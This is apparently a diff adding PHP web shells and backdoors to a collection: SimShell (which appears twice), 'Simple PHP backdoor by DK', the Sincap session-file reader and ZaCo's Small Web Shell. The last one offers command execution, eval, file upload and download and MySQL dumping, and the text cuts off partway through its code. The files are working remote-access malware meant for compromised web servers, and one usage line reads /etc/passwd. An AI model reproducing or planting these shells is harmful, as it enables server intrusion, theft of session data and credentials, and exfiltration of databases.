+  }
+  
+  if (!empty($_REQUEST['command'])) {
+    if (get_magic_quotes_gpc()) {
+      $_REQUEST['command'] = stripslashes($_REQUEST['command']);
+    }
+    if (($i = array_search($_REQUEST['command'], $_SESSION['history'])) !== false)
+      unset($_SESSION['history'][$i]);
+    
+    array_unshift($_SESSION['history'], $_REQUEST['command']);
+  
+    $_SESSION['output'] .= '$ ' . $_REQUEST['command'] . "\n";
+
+    if (ereg('^[[:blank:]]*cd[[:blank:]]*$', $_REQUEST['command'])) {
+      $_SESSION['cwd'] = dirname(__FILE__);
+    } elseif (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $_REQUEST['command'], $regs)) {
+
+      if ($regs[1][0] == '/') {
+
+        $new_dir = $regs[1];
+      } else {
+
+        $new_dir = $_SESSION['cwd'] . '/' . $regs[1];
+      }
+      
+
+      while (strpos($new_dir, '/./') !== false)
+        $new_dir = str_replace('/./', '/', $new_dir);
+
+
+      while (strpos($new_dir, '//') !== false)
+        $new_dir = str_replace('//', '/', $new_dir);
+
+      while (preg_match('|/\.\.(?!\.)|', $new_dir))
+        $new_dir = preg_replace('|/?[^/]+/\.\.(?!\.)|', '', $new_dir);
+      
+      if ($new_dir == '') $new_dir = '/';
+      
+
+      if (@chdir($new_dir)) {
+        $_SESSION['cwd'] = $new_dir;
+      } else {
+        $_SESSION['output'] .= "cd: could not change to: $new_dir\n";
+      }
+      
+    } else {
+
+      chdir($_SESSION['cwd']);
+
+      $length = strcspn($_REQUEST['command'], " \t");
+      $token = substr($_REQUEST['command'], 0, $length);
+      if (isset($aliases[$token]))
+        $_REQUEST['command'] = $aliases[$token] . substr($_REQUEST['command'], $length);
+    
+      $p = proc_open($_REQUEST['command'],
+                     array(1 => array('pipe', 'w'),
+                           2 => array('pipe', 'w')),
+                     $io);
+
+
+      while (!feof($io[1])) {
+        $_SESSION['output'] .= htmlspecialchars(fgets($io[1]),
+                                                ENT_COMPAT, 'UTF-8');
+      }
+
+      while (!feof($io[2])) {
+        $_SESSION['output'] .= htmlspecialchars(fgets($io[2]),
+                                                ENT_COMPAT, 'UTF-8');
+      }
+      
+      fclose($io[1]);
+      fclose($io[2]);
+      proc_close($p);
+    }
+  }
+
+
+  if (empty($_SESSION['history'])) {
+    $js_command_hist = '""';
+  } else {
+    $escaped = array_map('addslashes', $_SESSION['history']);
+    $js_command_hist = '"", "' . implode('", "', $escaped) . '"';
+  }
+
+
+header('Content-Type: text/html; charset=UTF-8');
+
+echo '<?xml version="1.0" encoding="UTF-8"?>' . "\n";
+?>
+
+<head>
+  <title>SimShell - Simorgh Security MGZ</title>
+  <link rel="stylesheet" href="Simshell.css" type="text/css" />
+
+  <script type="text/javascript" language="JavaScript">
+  var current_line = 0;
+  var command_hist = new Array(<?php echo $js_command_hist ?>);
+  var last = 0;
+
+  function key(e) {
+    if (!e) var e = window.event;
+
+    if (e.keyCode == 38 && current_line < command_hist.length-1) {
+      command_hist[current_line] = document.shell.command.value;
+      current_line++;
+      document.shell.command.value = command_hist[current_line];
+    }
+
+    if (e.keyCode == 40 && current_line > 0) {
+      command_hist[current_line] = document.shell.command.value;
+      current_line--;
+      document.shell.command.value = command_hist[current_line];
+    }
+
+  }
+
+function init() {
+  document.shell.setAttribute("autocomplete", "off");
+  document.shell.output.scrollTop = document.shell.output.scrollHeight;
+  document.shell.command.focus();
+}
+
+  </script>
+</head>
+
+<body   onload="init()" style="color: #00FF00; background-color: #000000">
+
+<span style="background-color: #000000">
+
+
+
+</body>
+
+</body>
+</html>
+
+
+
+</span>
+
+
+
+<p><span style="background-color: #000000">&nbsp;Directory: </span> <code>
+<span style="background-color: #000000"><?php echo $_SESSION['cwd'] ?></span></code></p>
+
+<form name="shell" action="<?php echo $_SERVER['PHP_SELF'] ?>" method="post">
+<div style="width: 900; height: 454">
+<textarea name="output" readonly="readonly" cols="120" rows="20" style="color: #CCFF33; border: 1px dashed #FF0000; background-color: #000000">
+<?php
+$lines = substr_count($_SESSION['output'], "\n");
+$padding = str_repeat("\n", max(0, $_REQUEST['rows']+1 - $lines));
+echo rtrim($padding . $_SESSION['output']);
+?>
+</textarea>
+<p class="prompt" align="justify">
+  cmd:<input class="prompt" name="command" type="text"
+                onkeyup="key(event)" size="60" tabindex="1" style="border: 1px dotted #808080">
+  <input type="submit" value="Enter" /><input type="submit" name="reset" value="Reset" /> Rows: 
+  <input type="text" name="rows" value="<?php echo $_REQUEST['rows'] ?>" size="5" />
+</p>
+<p class="prompt" align="center">
+  <br>
+  <br>
+&nbsp;<font color="#C0C0C0" size="2">Copyright 2004-Simorgh Security<br>
+  Make On PhpShell Kernel<br>
+  <a href="http://www.simorgh-ev.com" style="text-decoration: none">
+  <font color="#C0C0C0">www.simorgh-ev.com</font></a></font></p>
+</div>
+</form>
+
+
+</html>

php/SimShell_1.0_-_Simorgh_Security_MGZ.php

@@ -0,0 +1,180 @@
+<?php
+
+/*Simorgh Security Magazine */
+  session_start();
+if (empty($_SESSION['cwd']) || !empty($_REQUEST['reset'])) {
+    $_SESSION['cwd'] = getcwd();
+    $_SESSION['history'] = array();
+    $_SESSION['output'] = '';
+  }
+  
+  if (!empty($_REQUEST['command'])) {
+    if (get_magic_quotes_gpc()) {
+      $_REQUEST['command'] = stripslashes($_REQUEST['command']);
+    }
+    if (($i = array_search($_REQUEST['command'], $_SESSION['history'])) !== false)
+      unset($_SESSION['history'][$i]);
+    
+    array_unshift($_SESSION['history'], $_REQUEST['command']);
+  
+    $_SESSION['output'] .= '$ ' . $_REQUEST['command'] . "\n";
+
+    if (ereg('^[[:blank:]]*cd[[:blank:]]*$', $_REQUEST['command'])) {
+      $_SESSION['cwd'] = dirname(__FILE__);
+    } elseif (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $_REQUEST['command'], $regs)) {
+
+      if ($regs[1][0] == '/') {
+
+        $new_dir = $regs[1];
+      } else {
+
+        $new_dir = $_SESSION['cwd'] . '/' . $regs[1];
+      }
+      
+
+      while (strpos($new_dir, '/./') !== false)
+        $new_dir = str_replace('/./', '/', $new_dir);
+
+
+      while (strpos($new_dir, '//') !== false)
+        $new_dir = str_replace('//', '/', $new_dir);
+
+      while (preg_match('|/\.\.(?!\.)|', $new_dir))
+        $new_dir = preg_replace('|/?[^/]+/\.\.(?!\.)|', '', $new_dir);
+      
+      if ($new_dir == '') $new_dir = '/';
+      
+
+      if (@chdir($new_dir)) {
+        $_SESSION['cwd'] = $new_dir;
+      } else {
+        $_SESSION['output'] .= "cd: could not change to: $new_dir\n";
+      }
+      
+    } else {
+
+      chdir($_SESSION['cwd']);
+
+      $length = strcspn($_REQUEST['command'], " \t");
+      $token = substr($_REQUEST['command'], 0, $length);
+      if (isset($aliases[$token]))
+        $_REQUEST['command'] = $aliases[$token] . substr($_REQUEST['command'], $length);
+    
+      $p = proc_open($_REQUEST['command'],
+                     array(1 => array('pipe', 'w'),
+                           2 => array('pipe', 'w')),
+                     $io);
+
+
+      while (!feof($io[1])) {
+        $_SESSION['output'] .= htmlspecialchars(fgets($io[1]),
+                                                ENT_COMPAT, 'UTF-8');
+      }
+
+      while (!feof($io[2])) {
+        $_SESSION['output'] .= htmlspecialchars(fgets($io[2]),
+                                                ENT_COMPAT, 'UTF-8');
+      }
+      
+      fclose($io[1]);
+      fclose($io[2]);
+      proc_close($p);
+    }
+  }
+
+
+  if (empty($_SESSION['history'])) {
+    $js_command_hist = '""';
+  } else {
+    $escaped = array_map('addslashes', $_SESSION['history']);
+    $js_command_hist = '"", "' . implode('", "', $escaped) . '"';
+  }
+
+
+header('Content-Type: text/html; charset=UTF-8');
+
+echo '<?xml version="1.0" encoding="UTF-8"?>' . "\n";
+?>
+
+<head>
+  <title>SimShell - Simorgh Security MGZ</title>
+  <link rel="stylesheet" href="Simshell.css" type="text/css" />
+
+  <script type="text/javascript" language="JavaScript">
+  var current_line = 0;
+  var command_hist = new Array(<?php echo $js_command_hist ?>);
+  var last = 0;
+
+  function key(e) {
+    if (!e) var e = window.event;
+
+    if (e.keyCode == 38 && current_line < command_hist.length-1) {
+      command_hist[current_line] = document.shell.command.value;
+      current_line++;
+      document.shell.command.value = command_hist[current_line];
+    }
+
+    if (e.keyCode == 40 && current_line > 0) {
+      command_hist[current_line] = document.shell.command.value;
+      current_line--;
+      document.shell.command.value = command_hist[current_line];
+    }
+
+  }
+
+function init() {
+  document.shell.setAttribute("autocomplete", "off");
+  document.shell.output.scrollTop = document.shell.output.scrollHeight;
+  document.shell.command.focus();
+}
+
+  </script>
+</head>
+
+<body   onload="init()" style="color: #00FF00; background-color: #000000">
+
+<span style="background-color: #000000">
+
+
+
+</body>
+
+</body>
+</html>
+
+
+
+</span>
+
+
+
+<p><span style="background-color: #000000">&nbsp;Directory: </span> <code>
+<span style="background-color: #000000"><?php echo $_SESSION['cwd'] ?></span></code></p>
+
+<form name="shell" action="<?php echo $_SERVER['PHP_SELF'] ?>" method="post">
+<div style="width: 900; height: 454">
+<textarea name="output" readonly="readonly" cols="120" rows="20" style="color: #CCFF33; border: 1px dashed #FF0000; background-color: #000000">
+<?php
+$lines = substr_count($_SESSION['output'], "\n");
+$padding = str_repeat("\n", max(0, $_REQUEST['rows']+1 - $lines));
+echo rtrim($padding . $_SESSION['output']);
+?>
+</textarea>
+<p class="prompt" align="justify">
+  cmd:<input class="prompt" name="command" type="text"
+                onkeyup="key(event)" size="60" tabindex="1" style="border: 1px dotted #808080">
+  <input type="submit" value="Enter" /><input type="submit" name="reset" value="Reset" /> Rows: 
+  <input type="text" name="rows" value="<?php echo $_REQUEST['rows'] ?>" size="5" />
+</p>
+<p class="prompt" align="center">
+  <br>
+  <br>
+&nbsp;<font color="#C0C0C0" size="2">Copyright 2004-Simorgh Security<br>
+  Make On PhpShell Kernel<br>
+  <a href="http://www.simorgh-ev.com" style="text-decoration: none">
+  <font color="#C0C0C0">www.simorgh-ev.com</font></a></font></p>
+</div>
+</form>
+
+
+</html>

php/Simple_PHP_backdoor_by_DK.php

@@ -0,0 +1,19 @@
+
+<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->
+
+<?php
+
+if(isset($_REQUEST['cmd'])){
+        echo "<pre>";
+        $cmd = ($_REQUEST['cmd']);
+        system($cmd);
+        echo "</pre>";
+        die;
+}
+
+?>
+
+Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
+
+<!--    http://michaeldaw.org   2006    -->
+

php/Sincap 1.0.php

@@ -0,0 +1,124 @@
+<html>
+
+<head>
+<meta http-equiv="Content-Language" content="tr">
+<meta name="GENERATOR" content="Microsoft FrontPage 6.0">
+<meta name="ProgId" content="FrontPage.Editor.Document">
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
+<title>:: AventGrup ::.. - Sincap 1.0 | Session(Oturum) Böceði&nbsp;&nbsp; </title>
+</head>
+
+<body text="#008000" bgcolor="#808080" topmargin="0" leftmargin="0" rightmargin="0" bottommargin="0" marginwidth="0" marginheight="0">
+
+<table border="0" width="100%" id="table1" cellspacing="0" cellpadding="0" height="108">
+	<tr>
+    <td width="70" bgcolor="#000000" height="83">
+    <p align="center">
+    <img border="0" src="http://www.aventgrup.net/avlog.gif"></td>
+    <td width="501" bgcolor="#000000" height="83" valign="top">
+    <font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
+    <span style="font-weight: 700">
+    <br>
+    AventGrup©<br>
+    </span>Avrasya Veri ve NetWork Teknolojileri Geliþtirme Grubu<br>
+    <span style="font-weight: 700">
+    <br>
+    Sincap 1.0</span></font></td>
+    <td width="431" bgcolor="#000000" height="83" valign="top">
+    <p align="right"><span style="font-weight: 700">
+    <font face="Verdana" color="#858585" style="font-size: 2pt"><br>
+    <br>
+    </font><br>
+    <font color="#858585" face="Verdana" style="font-size: 8pt">www.aventgrup.net&nbsp;<br>
+    </font></span><a href="mailto:shopen@aventgrup.net">
+	<font face="Verdana" style="font-size: 8pt; text-decoration: none" color="#C0C0C0">
+	info@aventgrup.net</font></a><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;</font></td>
+  	</tr>
+	<tr>
+    <td width="1002" bgcolor="#484848" height="25" colspan="3">
+    <font color="#E5E5E5" style="font-size: 8pt; font-weight: 700" face="Arial">&nbsp; 
+	Linux Sessin ( Oturum ) Böceði</font></td>
+    </tr>
+</table>
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#800000" width="100%" id="AutoNumber1">
+  <tr>
+    <td width="8%" bgcolor="#B6B6B6">
+    <font face="Verdana" style="font-size: 8pt; font-weight: 700" color="#000000">&nbsp;S. 
+    No</font></td>
+    <td width="25%" bgcolor="#B6B6B6">
+    <font face="Verdana" style="font-size: 8pt; font-weight: 700" color="#000000">&nbsp;Oturum 
+    Adý</font></td>
+    <td width="42%" bgcolor="#B6B6B6">
+    <font face="Verdana" style="font-size: 8pt; font-weight: 700" color="#000000">&nbsp;Oturum 
+    Deðeri</font></td>
+    <td width="25%" bgcolor="#B6B6B6">
+    <font face="Verdana" style="font-size: 8pt; font-weight: 700" color="#000000">&nbsp;Referans</font></td>
+  </tr>
+<tr>
+
+
+<?
+if ($sedat=@opendir("/tmp")){
+while (($ekinci=readdir ($sedat))){
+if (is_file("/tmp/$ekinci")){
+if($ekinci>"sess_"){
+$asortik=$ekinci;
+$baglan=fopen("/tmp/$ekinci",'r');
+while(! feof ( $baglan ) ){
+$okunan=fgets($baglan,1024);
+$toplam="$toplam$okunan";
+} fclose($baglan); 
+};
+?>
+
+
+
+<?
+}}}
+closedir($sedat);
+?>
+
+<?
+$metin=$toplam;
+$i=explode(";",$metin);
+?>
+
+
+
+
+<?
+foreach($i as $yeni){
+$tampon=explode("|",$yeni);
+$deger1= "$tampon[0]";
+$ich=explode(":",$tampon[1]);
+$tampon3=count($ich);
+$tampon4=$tampon3-1;
+$deger2= "$ich[$tampon4]";
+$is++;
+$temizleme=array(
+'"'=>'',
+'v'=>'',
+'c'=>''
+);
+$degerT= strtr($deger2,$temizleme);
+?>
+    <td width="8%" bgcolor="#E5E5E5" align="left" valign="top">
+    <font face="Verdana" style="font-size: 8pt" color="#000000">&nbsp;<?echo $is;?></font></td>
+    <td width="25%" bgcolor="#E5E5E5" align="left" valign="top">
+    <font face="Verdana" style="font-size: 8pt" color="#000000">&nbsp;<?echo $deger1;?></font></td>
+    <td width="42%" bgcolor="#E5E5E5" align="left" valign="top">
+    <font face="Verdana" style="font-size: 8pt" color="#000000">&nbsp;<?echo $degerT;?></font></td>
+    <td width="25%" bgcolor="#E5E5E5" align="left" valign="top">
+    <font face="Verdana" style="font-size: 8pt" color="#000000">&nbsp;-</td>
+
+</tr>
+<?};?>
+
+</table>
+
+</body>
+
+</html>
+
+

php/Small Web Shell by ZaCo.php

@@ -0,0 +1,501 @@
+<?
+  ##########################################################
+ # Small PHP Web Shell by ZaCo (c) 2004-2006                #
+ #  +POST method                                            #
+ #  +MySQL Client+Dumper for DB  and tables                 #
+ #  +PHP eval in text format and html for phpinfo() example #
+ # PREVED: sn0w, Zadoxlik, Rebz, SkvoznoY, PinkPanther      #
+ # For antichat.ru and cup.su friends usage                 #
+ # All bugs -> mailo:zaco@yandex.ru                         #
+ # Just for fun :)                                          #
+  ##########################################################
+error_reporting(E_ALL);
+@set_time_limit(0);
+function magic_q($s)
+{
+if(get_magic_quotes_gpc())
+{
+$s=str_replace('\\\'','\'',$s);
+$s=str_replace('\\\\','\\',$s);
+$s=str_replace('\\"','"',$s);
+$s=str_replace('\\\0','\0',$s);
+}
+return $s;
+}
+function get_perms($fn)
+{
+$mode=fileperms($fn);
+$perms='';
+$perms .= ($mode & 00400) ? 'r' : '-';
+$perms .= ($mode & 00200) ? 'w' : '-';
+$perms .= ($mode & 00100) ? 'x' : '-';
+$perms .= ($mode & 00040) ? 'r' : '-';
+$perms .= ($mode & 00020) ? 'w' : '-';
+$perms .= ($mode & 00010) ? 'x' : '-';
+$perms .= ($mode & 00004) ? 'r' : '-';
+$perms .= ($mode & 00002) ? 'w' : '-';
+$perms .= ($mode & 00001) ? 'x' : '-';
+return $perms;
+}
+$head=<<<headka
+<html>
+<head>
+<title>Small Web Shell by ZaCo</title>
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
+</head>
+<body link=palegreen vlink=palegreen text=palegreen bgcolor=#2B2F34>
+<style>
+textarea {
+BORDER-RIGHT:  #ffffff 1px solid;
+BORDER-TOP:    #999999 1px solid;
+BORDER-LEFT:   #999999 1px solid;
+BORDER-BOTTOM: #ffffff 1px solid;
+BACKGROUND-COLOR: #e4e0d8;
+font: Fixedsys bold;
+}
+input {
+BORDER-RIGHT:  #ffffff 1px solid;
+BORDER-TOP:    #999999 1px solid;
+BORDER-LEFT:   #999999 1px solid;
+BORDER-BOTTOM: #ffffff 1px solid;
+BACKGROUND-COLOR: #e4e0d8;
+font: 8pt Verdana;
+}
+</style>
+headka;
+$page=isset($_POST['page'])?$_POST['page']:(isset($_SERVER['QUERY_STRING'])?$_SERVER['QUERY_STRING']:'');
+$page=$page==''||($page!='cmd'&&$page!='mysql'&&$page!='eval')?'cmd':$page;
+$winda=strpos(strtolower(php_uname()),'wind');
+define('format',50);
+$pages='<center>###<a href=\''.basename(__FILE__).'\'>cmd</a>###<a href=\''.basename(__FILE__).'?mysql\'>mysql</a>###<a href=\''.basename(__FILE__).'?eval\'>eval</a>###</center>'.($winda===false?'id :'.`id`:'');
+switch($page)
+{
+case 'eval':
+{
+$eval_value=isset($_POST['eval_value'])?$_POST['eval_value']:'';
+$eval_value=magic_q($eval_value);
+$action=isset($_POST['action'])?$_POST['action']:'eval';
+if($action=='eval_in_html') @eval($eval_value);
+else
+{
+echo($head.$pages);
+?>
+<hr>
+<form method=post>
+<textarea cols=120 rows=20 name='eval_value'><?@eval($eval_value);?></textarea>
+<input name='action' value='eval' type='submit'>
+<input name='action' value='eval_in_html' type='submit'>
+<input name='page' value='eval' type=hidden>
+</form>
+<hr>
+<?
+}
+break;
+}
+case 'cmd':
+{
+$cmd=!empty($_POST['cmd'])?magic_q($_POST['cmd']):'';
+$work_dir=isset($_POST['work_dir'])?$_POST['work_dir']:getcwd();
+$action=isset($_POST['action'])?$_POST['action']:'cmd';
+if(@is_dir($work_dir))
+{
+@chdir($work_dir);
+$work_dir=getcwd();
+if($work_dir=='')$work_dir='/';
+else if(!($work_dir{strlen($work_dir)-1}=='/'||$work_dir{strlen($work_dir)-1}=='\\')) $work_dir.='/';
+}
+else if(file_exists($work_dir))$work_dir=realpath($work_dir);
+$work_dir=str_replace('\\','/',$work_dir);
+$e_work_dir=htmlspecialchars($work_dir,ENT_QUOTES);
+switch($action)
+{
+case 'cmd' :
+{
+echo($head.$pages);
+?>
+<form method='post' name='main_form'>
+<input name='work_dir' value='<?=$e_work_dir?>' type=text size=120>
+<input name='page' value='cmd' type=hidden>
+<input type=submit value='go'>
+</form>
+<form method=post>
+<input name='cmd' type=text size=120 value='<?=str_replace('\'','&#039;',$cmd)?>'>
+<input name='work_dir'type=hidden>
+<input name='page' value='cmd' type=hidden>
+<input name='action' value='cmd' type=submit onclick="work_dir.value=document.main_form.work_dir.value;">
+</form>
+<form method=post enctype="multipart/form-data">
+<input type="file" name="filename">
+<input name='work_dir'type=hidden>
+<input name='page' value='cmd' type=hidden>
+<input name='action' value='upload' type=submit onclick="work_dir.value=document.main_form.work_dir.value;">
+</form>
+<form method=post>
+<input name='fname' type=text size=120><br>
+<input name='archive' type=radio value='none'>without arch
+<input name='archive' type=radio value='gzip' checked=true>gzip archive
+<input name='work_dir'type=hidden>
+<input name='page' value='cmd' type=hidden>
+<input name='action' value='download' type=submit onclick="work_dir.value=document.main_form.work_dir.value;">
+</form>
+<pre>
+<?
+if($cmd!==''){ echo('<strong>'.htmlspecialchars($cmd)."</strong><hr>\n<textarea cols=120 rows=20>\n".htmlspecialchars(`$cmd`)."\n</textarea>");}
+else
+{
+$f_action=isset($_POST['f_action'])?$_POST['f_action']:'view';
+if(@is_dir($work_dir))
+{
+echo('<strong>Listing '.$e_work_dir.'</strong><hr>');
+$handle=@opendir($work_dir);
+if($handle)
+{
+while(false!==($fn=readdir($handle))){$files[]=$fn;};
+@closedir($handle);
+sort($files);
+$not_dirs=array();
+for($i=0;$i<sizeof($files);$i++)
+{
+$fn=$files[$i];
+if(is_dir($fn))
+{
+echo('<a href=\'#\' onclick=\'document.list.work_dir.value="'.$e_work_dir.str_replace('"','&quot;',$fn).'";document.list.submit();\'><b>'.htmlspecialchars(strlen($fn)>format?substr($fn,0,format-3).'...':$fn).'</b></a>'.str_repeat(' ',format-strlen($fn)));
+if($winda===false)
+{
+$owner=@posix_getpwuid(@fileowner($work_dir.$fn));
+$group=@posix_getgrgid(@filegroup($work_dir.$fn));
+printf("% 20s|% -20s",$owner['name'],$group['name']);
+}
+echo(@get_perms($work_dir.$fn).str_repeat(' ',10));
+printf("% 20s ",@filesize($work_dir.$fn).'B');
+printf("% -20s",@date('M d Y H:i:s',@filemtime($work_dir.$fn))."\n");
+}
+else {$not_dirs[]=$fn;}
+}
+for($i=0;$i<sizeof($not_dirs);$i++)
+{
+$fn=$not_dirs[$i];
+echo('<a href=\'#\' onclick=\'document.list.work_dir.value="'.(is_link($work_dir.$fn)?$e_work_dir.readlink($work_dir.$fn):$e_work_dir.str_replace('"','&quot;',$fn)).'";document.list.submit();\'>'.htmlspecialchars(strlen($fn)>format?substr($fn,0,format-3).'...':$fn).'</a>'.str_repeat(' ',format-strlen($fn)));
+if($winda===false)
+{
+$owner=@posix_getpwuid(@fileowner($work_dir.$fn));
+$group=@posix_getgrgid(@filegroup($work_dir.$fn));
+printf("% 20s|% -20s",$owner['name'],$group['name']);
+}
+echo(@get_perms($work_dir.$fn).str_repeat(' ',10));
+printf("% 20s ",@filesize($work_dir.$fn).'B');
+printf("% -20s",@date('M d Y H:i:s',@filemtime($work_dir.$fn))."\n");
+}
+echo('</pre><hr>');
+?>
+<form name='list' method=post>
+<input name='work_dir' type=hidden size=120><br>
+<input name='page' value='cmd' type=hidden>
+<input name='f_action' value='view' type=hidden>
+</form>
+<?
+} else echo('Error Listing '.$e_work_dir);
+}
+else
+switch($f_action)
+{
+case 'view':
+{
+echo('<strong>'.$e_work_dir." Edit</strong><hr><pre>\n");
+$f=@fopen($work_dir,'r');
+?>
+<form method=post>
+<textarea name='file_text' cols=120 rows=20><?if(!($f))echo($e_work_dir.' not exists');else while(!feof($f))echo htmlspecialchars(fread($f,100000))?></textarea>
+<input name='page' value='cmd' type=hidden>
+<input name='work_dir' type=hidden value='<?=$e_work_dir?>' size=120>
+<input name='f_action' value='save' type=submit>
+</form>
+<?
+break;
+}
+case 'save' :
+{
+$file_text=isset($_POST['file_text'])?magic_q($_POST['file_text']):'';
+$f=@fopen($work_dir,'w');
+if(!($f))echo('<strong>Error '.$e_work_dir."</strong><hr><pre>\n");
+else
+{
+fwrite($f,$file_text);
+fclose($f);
+echo('<strong>'.$e_work_dir." is saving</strong><hr><pre>\n");
+}
+break;
+}
+}
+break;
+}
+break;
+}
+case 'upload' :
+{
+if($work_dir=='')$work_dir='/';
+else if(!($work_dir{strlen($work_dir)-1}=='/'||$work_dir{strlen($work_dir)-1}=='\\')) $work_dir.='/';
+$f=$_FILES["filename"]["name"];
+if(!@copy($_FILES["filename"]["tmp_name"], $work_dir.$f)) echo('Upload is failed');
+else
+{
+echo('file is uploaded in '.$e_work_dir);
+}
+break;
+}
+case 'download' :
+{
+$fname=isset($_POST['fname'])?$_POST['fname']:'';
+$temp_file=isset($_POST['temp_file'])?'on':'nn';
+$f=@fopen($fname,'r');
+if(!($f)) echo('file is not exists');
+else
+{
+$archive=isset($_POST['archive'])?$_POST['archive']:'';
+if($archive=='gzip')
+{
+Header("Content-Type:application/x-gzip\n");
+$s=gzencode(fread($f,filesize($fname)));
+Header('Content-Length: '.strlen($s)."\n");
+Header('Content-Disposition: attachment; filename="'.str_replace('/','-',$fname).".gz\n\n");
+echo($s);
+}
+else
+{
+Header("Content-Type:application/octet-stream\n");
+Header('Content-Length: '.filesize($fname)."\n");
+Header('Content-Disposition: attachment; filename="'.str_replace('/','-',$fname)."\n\n");
+ob_start();
+while(feof($f)===false)
+{
+echo(fread($f,10000));
+ob_flush();
+}
+}
+}
+}
+}
+break;
+}
+case 'mysql' :
+{
+$action=isset($_POST['action'])?$_POST['action']:'query';
+$user=isset($_POST['user'])?$_POST['user']:'';
+$passwd=isset($_POST['passwd'])?$_POST['passwd']:'';
+$db=isset($_POST['db'])?$_POST['db']:'';
+$host=isset($_POST['host'])?$_POST['host']:'localhost';
+$query=isset($_POST['query'])?magic_q($_POST['query']):'';
+switch($action)
+{
+case 'dump' :
+{
+$mysql_link=@mysql_connect($host,$user,$passwd);
+if(!($mysql_link)) echo('Connect error');
+else
+{
+//@mysql_query('SET NAMES cp1251'); - use if you have problems whis code symbols
+$to_file=isset($_POST['to_file'])?($_POST['to_file']==''?false:$_POST['to_file']):false;
+$archive=isset($_POST['archive'])?$_POST['archive']:'none';
+if($archive!=='none')$to_file=false;
+$db_dump=isset($_POST['db_dump'])?$_POST['db_dump']:'';
+$table_dump=isset($_POST['table_dump'])?$_POST['table_dump']:'';
+if(!(@mysql_select_db($db_dump,$mysql_link)))echo('DB error');
+else
+{
+$dump_file="#ZaCo MySQL Dumper\n#db $db from $host\n";
+ob_start();
+if($to_file){$t_f=@fopen($to_file,'w');if(!$t_f)die('Cant opening '.$to_file);}else $t_f=false;
+if($table_dump=='')
+{
+if(!$to_file)
+{
+header('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."\n");
+header("Content-Disposition: attachment; filename=\"dump_{$db_dump}.sql".($archive=='none'?'':'.gz')."\"\n\n");
+}
+$result=mysql_query('show tables',$mysql_link);
+for($i=0;$i<mysql_num_rows($result);$i++)
+{
+$rows=mysql_fetch_array($result);
+$result2=@mysql_query('show columns from `'.$rows[0].'`',$mysql_link);
+if(!$result2)$dump_file.='#error table '.$rows[0];
+else
+{
+$dump_file.='create table `'.$rows[0]."`(\n";
+for($j=0;$j<mysql_num_rows($result2)-1;$j++)
+{
+$rows2=mysql_fetch_array($result2);
+$dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL').",\n";
+}
+$rows2=mysql_fetch_array($result2);
+$dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL')."\n";
+$type[$j]=$rows2[1];
+$dump_file.=");\n";
+mysql_free_result($result2);
+$result2=mysql_query('select * from `'.$rows[0].'`',$mysql_link);
+$columns=$j-1;
+for($j=0;$j<mysql_num_rows($result2);$j++)
+{
+$rows2=mysql_fetch_array($result2);
+$dump_file.='insert into `'.$rows[0].'` values (';
+for($k=0;$k<$columns;$k++)
+{
+$dump_file.=$rows2[$k]==''?'null,':'\''.addslashes($rows2[$k]).'\',';
+}
+$dump_file.=($rows2[$k]==''?'null);':'\''.addslashes($rows2[$k]).'\');')."\n";
+if($archive=='none')
+{
+if($to_file) {fwrite($t_f,$dump_file);fflush($t_f);}
+else
+{
+echo($dump_file);
+ob_flush();
+}
+$dump_file='';
+}
+}
+mysql_free_result($result2);
+}
+}
+mysql_free_result($result);
+if($archive!='none')
+{
+$dump_file=gzencode($dump_file);
+header('Content-Length: '.strlen($dump_file)."\n");
+echo($dump_file);
+}
+else if($t_f)
+{
+fclose($t_f);
+echo('Dump for '.$db_dump.' now in '.$to_file);
+}
+}
+else
+{
+$result2=@mysql_query('show columns from `'.$table_dump.'`',$mysql_link);
+if(!$result2)echo('error table '.$table_dump);
+else
+{
+if(!$to_file)
+{
+header('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."\n");
+header("Content-Disposition: attachment; filename=\"dump_{$db_dump}.sql".($archive=='none'?'':'.gz')."\"\n\n");
+}
+if($to_file===false)
+{
+header('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."\n");
+header("Content-Disposition: attachment; filename=\"dump_{$db_dump}_${table_dump}.sql".($archive=='none'?'':'.gz')."\"\n\n");
+}
+$dump_file.="create table `{$table_dump}`(\n";
+for($j=0;$j<mysql_num_rows($result2)-1;$j++)
+{
+$rows2=mysql_fetch_array($result2);
+$dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL').",\n";
+}
+$rows2=mysql_fetch_array($result2);
+$dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL')."\n";
+$type[$j]=$rows2[1];
+$dump_file.=");\n";
+mysql_free_result($result2);
+$result2=mysql_query('select * from `'.$table_dump.'`',$mysql_link);
+$columns=$j-1;
+for($j=0;$j<mysql_num_rows($result2);$j++)
+{
+$rows2=mysql_fetch_array($result2);
+$dump_file.='insert into `'.$table_dump.'` values (';
+for($k=0;$k<$columns;$k++)
+{
+$dump_file.=$rows2[$k]==''?'null,':'\''.addslashes($rows2[$k]).'\',';
+}
+$dump_file.=($rows2[$k]==''?'null);':'\''.addslashes($rows2[$k]).'\');')."\n";
+if($archive=='none')
+{
+if($to_file) {fwrite($t_f,$dump_file);fflush($t_f);}
+else
+{
+echo($dump_file);
+ob_flush();
+}
+$dump_file='';
+}
+}
+mysql_free_result($result2);
+if($archive!='none')
+{
+$dump_file=gzencode($dump_file);
+header('Content-Length: '.strlen($dump_file)."\n");
